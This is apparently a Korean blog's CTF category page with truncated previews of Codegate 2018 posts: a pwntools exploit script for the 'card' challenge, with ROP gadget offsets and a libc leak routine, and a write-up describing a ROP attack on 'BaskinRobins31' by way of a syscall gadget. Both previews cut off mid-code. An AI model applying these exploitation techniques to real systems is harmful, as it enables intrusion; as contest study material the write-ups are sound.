CTF/Codegate (2) 썸네일형 리스트형 Codegate 2018 'card' exploit code #!/usr/bin/python from pwn import * from struct import * p = process("./card") p = remote("110.10.147.17",8888) e = ELF("./card") l = ELF("/lib/i386-linux-gnu/libc.so.6") l = ELF("/lib32/libc.so.6") raw_input(">>>") pppr = 0x1439 leaveret = 0xd3c pebpret = 0x143b addr = 0 def leak(snum): addr = 0 for i in [1,0x100,0x10000,0x1000000]: p.readuntil("x, y : ") p.sendline("{},0".format(snum)) p.readu.. Codegate 2018 Write up : melong, BaskinRobins31, RedVelvet, ImpelDown BaskinRobins31 Category : pwn 그냥 simple ROP 문제이다. 굳이 게임을 이길 필요는 없고 사용자 턴일때 ROP를 할 수 있다. 단 libc 파일이 주어지지 않아 *운*이 좋게인진 모르겠는데 최신 버전은 다 그런지도 모르겠지만은 본인 버전 libc로는 오프셋 계산 공격이 되지 않길래 libc의 read함수 text영역에서 \x0f\x05(syscall)이 나올때까지 긁은 후 시스템 콜 인자를 구성 해 공격 했다.#!/usr/bin/python from pwn import * e = ELF("./BaskinRobins31") context.clear(arch='amd64') #p = process("./BaskinRobins31"); p = remote("ch41l3ng3s.c.. 이전 1 다음